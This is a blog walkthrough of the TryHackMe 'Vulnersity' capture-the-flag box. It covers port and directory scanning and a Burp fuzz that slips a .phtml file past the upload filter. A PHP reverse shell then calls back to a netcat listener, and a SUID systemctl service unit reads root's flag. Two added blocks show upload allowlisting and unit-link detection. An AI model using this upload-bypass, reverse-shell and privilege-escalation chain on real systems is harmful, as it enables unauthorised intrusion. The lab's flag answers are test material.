THM — Vulnersity

Yikai
Nov 12, 2020

Reconnaissance

Nmap scan

kali@kali:~$ nmap -T4 -A 10.10.215.50
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 03:12 EST
Nmap scan report for 10.10.215.50
Host is up (0.35s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2020-11-12T03:13:29-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-12T08:13:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.06 seconds

Scan the box, how many ports are open?

Ans: 6

What version of the squid proxy is running on the machine?

Ans: 3.5.12

How many ports will nmap scan if the flag -p-400 was used?

Ans: 400

Using the nmap flag -n what will it not resolve?

Check the nmap manual: $ man nmap

Ans: DNS

What is the most likely operating system this machine is running?

Ans: Ubuntu ****************

What port is the web server running on?

Ans: 3333

Locating directories using GoBuster

Before or while running GoBuster, we can open the target in a web browser. Remember to append port 3333 to the IP address, since the web server is hosted on that port:

<ip add>:3333

Entering that address shows the Vulnersity website.

Let’s get back to the GoBuster scan.

Usually I add some extensions with the -x flag to include in the scan:

$ gobuster dir -u http://10.10.215.50:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

Results of the scan:

kali@kali:~$ gobuster dir -u http://10.10.215.50:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.215.50:3333/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2020/11/12 03:42:50 Starting gobuster
===============================================================
/images (Status: 301)
/index.html (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)

What is the directory that has an upload form page?

By checking each directory, we find that /internal has the upload form page.

Ans: /internal/

Compromise the webserver

We can manually upload different file types to test the filter.

Or we can use Burp Suite to fuzz the upload form.

Check this link on how to set up the Burp proxy.

You could also use FoxyProxy to change proxy settings, as I do.

Now, at the upload form page, turn on the Burp proxy and open Burp Suite.

Upload a file and hit the submit button.

Go to Burp Suite and check the Intercept tab under the Proxy tab.

You should see a POST request as shown below.

Next, right click and select Send to Intruder.

In the Intruder/Positions tab, hit the Clear button to remove all the default payload positions. Make sure the attack type is set to Sniper.

Next, highlight the file extension and click Add to add a single payload position.

Go to the Payloads tab.

Under Payload Options [Simple list], add the following extensions by entering each one in the Add field:

php
php3
php4
php5
phtml

You could also put these extensions in a text file and click the Load button.

Once the extensions are added, click the Start attack button at the top right.

Check the result by clicking on the response for each payload.

All extensions other than phtml should return the message “Extension not allowed.”

The phtml payload response, however, should show the message “Success”.

With this, we know that files with the .phtml extension can be uploaded through the form.
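Why the form behaves this way, as an added example that is not part of the original post: a blocklist that refuses php/php3/php4/php5 still accepts .phtml, which Apache's PHP handler on Ubuntu typically also executes. An allowlist of the extensions the form actually needs closes that gap (the image extensions are an assumption about what the form is for).

```python
# Added example: the box's upload check as a blocklist, beside an allowlist fix.
import os

BLOCKED = {"php", "php3", "php4", "php5"}       # what the fuzzing run above implies
ALLOWED_IMAGES = {"jpg", "jpeg", "png", "gif"}  # assumed: the form exists for images


def _extension(filename: str) -> str:
    """Return the final extension, lower-cased, without the dot ('' if none)."""
    ext = os.path.splitext(os.path.basename(filename))[1]
    return ext[1:].lower()


def blocklist_check(filename: str) -> str:
    """Vulnerable logic: only the named extensions are refused.
    Returns the same messages the form showed during fuzzing."""
    if _extension(filename) in BLOCKED:
        return "Extension not allowed"
    return "Success"


def allowlist_check(filename: str) -> str:
    """Hardened logic: refuse anything that is not an expected image extension,
    including names with no extension at all."""
    if _extension(filename) not in ALLOWED_IMAGES:
        return "Extension not allowed"
    return "Success"


def fuzz_extensions(check, candidates):
    """Run one check over a list of extensions, like the Intruder sniper run,
    and return the extensions that were accepted."""
    return [e for e in candidates if check(f"payload.{e}") == "Success"]


if __name__ == "__main__":
    payloads = ["php", "php3", "php4", "php5", "phtml"]
    print("blocklist accepts:", fuzz_extensions(blocklist_check, payloads))
    print("allowlist accepts:", fuzz_extensions(allowlist_check, payloads))
```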

Next, we will use a PHP reverse shell as our payload.

Go to the link given by the THM box and copy the raw PHP code. Paste the code into a text file and name it php-reverse-shell.phtml. The important thing is that the extension must be “.phtml”.

Change the IP address in php-reverse-shell.phtml to your THM VPN IP address. That address is you, the attacker’s machine, which the victim machine will connect back to.

Change the port number you want the connection on; in my case I changed it to port 2222.

Next, run this command: $ nc -nvlp 2222

This uses netcat to listen for any incoming connection on port 2222.

kali@kali:~$ nc -nvlp 2222
listening on [any] 2222 ...

Go back to the upload page and upload php-reverse-shell.phtml.

Now you need to find where the file has been uploaded in order to execute the reverse shell code.

Since we know the upload form lives at http://<BoxIP>:3333/internal/, let’s run another gobuster scan to find hidden directories under /internal.

Note that my IP address changed, as my THM box expired and I had to re-deploy a new box to continue.

kali@kali:~$ gobuster dir -u http://10.10.80.30:3333/internal/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.80.30:3333/internal/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2020/11/12 08:03:39 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads (Status: 301)
/css (Status: 301)

From the scan we see an interesting directory: /uploads.

Going to http://<BoxIP>:3333/internal/uploads, we can see our php-reverse-shell.phtml there.

Click the file you uploaded, and you should see netcat report an incoming connection.

kali@kali:~$ nc -nvlp 2222
listening on [any] 2222 ...
connect to [10.4.2.142] from (UNKNOWN) [10.10.80.30] 59532
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
08:16:35 up 46 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
$ cd home
$ ls
bill
$

What is the name of the user who manages the webserver?

Ans: Bill

$ cd bill
$ ls
user.txt
$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb

What is the user flag?

Ans:8bd7992fbe8a6ad22a63361004cfcedb

Privilege Escalation

You can search for SUID files with the command: find / -perm -u=s -type f 2>/dev/null

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

On the system, search for all SUID files. What file stands out?

Ans: /bin/systemctl

We can head to GTFOBins to find a possible exploit for /bin/systemctl with the SUID bit set.

Based on the code from GTFOBins, I made some amendments.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Let’s break down what this code does.

TF=$(mktemp).service

The first line uses mktemp, a command that creates a temporary file or directory with a unique name.

The .service suffix makes the file a service unit, so we are creating a new service unit with a unique name.

The resulting path is assigned to the variable TF. The variable can have any name you want.

Read more about mktemp here.

Read more about creating system service unit in Linux here.

echo '[Service]

In the command above you see a single quote after echo. If you do not close it with another single quote, you can keep entering lines of input until you close it.

Below I show a short example of how it works:

kali@kali:~$ echo '
> Hello World
> Testing
> I feel good
> let us end this'
Hello World
Testing
I feel good
let us end this

So basically anything between the single quotes of the echo command is input ready to be echoed out.

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target
' > $TF

So the lines above are echoed and redirected into the file whose name is stored in TF.

Let’s look at what we are actually echoing into that file.

[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"

[Service] is one of the sections of a .service file.

In this section we can specify the type of service; here we specified oneshot.

ExecStart specifies the command to execute when the service starts.

/bin/sh -c: the -c option tells the shell to execute the commands in the string that follows.

"cat /root/root.txt > /tmp/output": when the service starts it runs cat on root.txt and writes whatever it contains to a file named “output”.

[Install]
WantedBy=multi-user.target

[Install] is one of the sections of a .service file.

WantedBy=multi-user.target states the runlevel (in systemd terms, the target) the service is started under.

/bin/systemctl link $TF
/bin/systemctl enable --now $TF

/bin/systemctl link $TF: if the unit file is not in the unit file search path, this links the unit file stored in TF into the unit file search path.

/bin/systemctl enable --now $TF: enables the unit file and, because of --now, starts it immediately. More information on both systemctl options can be found with the command: man systemctl

Next, we execute the commands.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
/bin/sh: 14: GNU: not found
$ $ > > > > $ Created symlink from /etc/systemd/system/tmp.bMLjkcXxtC.service to /tmp/tmp.bMLjkcXxtC.service.
$ Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.bMLjkcXxtC.service to /tmp/tmp.bMLjkcXxtC.service.

cd into the /tmp folder and you will find a file named “output”.

Cat it and you will get the flag.

$ cd /tmp
$ ls
output
systemd-private-cf589689c86e47e4a25d75a00d073d0f-systemd-timesyncd.service-kqhVWw
tmp.0bGYjSINSS
tmp.0bGYjSINSS.service
tmp.0vQo3HbZdD
tmp.bMLjkcXxtC
tmp.bMLjkcXxtC.service
tmp.sQtoqPg4jK
tmp.sQtoqPg4jK.service
tmp.xGP32zCZ15
tmp.xGP32zCZ15.service
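The symlinks that systemctl printed above are also the trace a defender can look for: link and enable leave entries under /etc/systemd/system pointing at the unit file, and a unit that lives in /tmp is not something a package installs. The following is an added example, not from the original post; the sample links are constructed from the output above plus one normal ssh.service link for contrast.

```python
# Added example: flag systemd unit links whose target lies outside the
# trusted unit directories, and surface what such a unit would run.
import os
import re

TRUSTED_UNIT_DIRS = ("/etc/systemd/system/", "/lib/systemd/system/",
                     "/usr/lib/systemd/system/", "/run/systemd/system/")


def scan_unit_dir(unit_dir="/etc/systemd/system"):
    """Collect (link, resolved target) pairs for every symlink under unit_dir,
    including the *.wants/ subdirectories that `systemctl enable` populates."""
    pairs = []
    for dirpath, _, filenames in os.walk(unit_dir):
        for name in filenames:
            link = os.path.join(dirpath, name)
            if os.path.islink(link):
                pairs.append((link, os.path.realpath(link)))
    return pairs


def suspicious_unit_links(pairs):
    """Return the links whose target unit is not in a trusted unit directory
    (for example a unit sitting in /tmp, as in the run above)."""
    return [(link, target) for link, target in pairs
            if not target.startswith(TRUSTED_UNIT_DIRS)]


def exec_start_lines(unit_text):
    """Pull the ExecStart= commands out of a unit file for the analyst to read."""
    return re.findall(r"^ExecStart=(.*)$", unit_text, flags=re.M)


# Constructed sample: the two links the box printed, plus a normal one.
SAMPLE_LINKS = [
    ("/etc/systemd/system/tmp.bMLjkcXxtC.service", "/tmp/tmp.bMLjkcXxtC.service"),
    ("/etc/systemd/system/multi-user.target.wants/tmp.bMLjkcXxtC.service",
     "/tmp/tmp.bMLjkcXxtC.service"),
    ("/etc/systemd/system/multi-user.target.wants/ssh.service",
     "/lib/systemd/system/ssh.service"),
]
# Constructed sample: the unit text written in the walkthrough above.
SAMPLE_UNIT = ('[Service]\nType=oneshot\n'
               'ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"\n'
               '[Install]\nWantedBy=multi-user.target\n')

if __name__ == "__main__":
    for link, target in suspicious_unit_links(SAMPLE_LINKS):
        print("unit outside trusted dirs:", link, "->", target)
    print("would run:", exec_start_lines(SAMPLE_UNIT))
```

On a live host, replace SAMPLE_LINKS with scan_unit_dir() and read each flagged target with exec_start_lines.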

Yikai

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.